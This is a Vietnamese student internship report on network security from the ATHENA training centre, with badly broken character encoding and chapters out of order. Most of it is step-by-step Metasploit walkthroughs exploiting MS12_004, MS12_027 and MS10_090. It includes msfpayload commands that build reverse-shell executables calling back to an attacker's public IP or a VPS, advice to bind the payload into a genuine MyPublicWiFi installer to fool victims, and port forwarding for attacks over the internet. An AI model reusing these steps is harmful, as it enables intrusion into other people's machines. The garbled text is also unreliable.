Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
iv
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN
Ngagravey thaacuteng năm
GIAacuteO VIEcircN HƯỚNG DẪN (Kyacute vagrave ghi rotilde họ tecircn)
v
MỤC LỤC
LỜI CAacuteM ƠN ii
NHẬN XEacuteT THỰC TẬP iii
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN iv
LỜI MỞ ĐẦU vii
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN MẠNG 1
11 GIỚI THIỆU VỀ COcircNG TY 1
12 LỊCH SỬ HIgraveNH THAgraveNH 1
13 QUAacute TRIgraveNH PHAacuteT TRIỂN 2
14 CHỨC NĂNG VAgrave NHIỆM VỤ 3
15 CƠ CẤU TỔ CHỨC 3
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH 3
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP 4
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG 5
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN 5
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN 5
221 TỔNG QUAN VỀ BACKTRACK 5
2211 GIỚI THIỆU BACKTRACK 5
2212 LỊCH SỬ PHAacuteT TRIỂN 6
2213 MỤC ĐIacuteCH 6
222 FOOTPRINTING 7
223 CAacuteC KIỂU FOOTPRINTING 8
2231 PASSIVE FOOTPRINTING 8
2232 ACTIVE FOOTPRING 13
224 SCANING 13
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH 14
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING 14
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG 20
2251 LỖI MS08_067 20
2252 LỖI MS10_090 26
2253 LỖI MS12_004 34
2254 LỖI MS12_027 43
vi
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET 52
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ VPS 59
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS 65
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute 69
31 ƯU ĐIỂM 69
32 KHUYẾT ĐIỂM 69
33 KẾT LUẬN 69
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
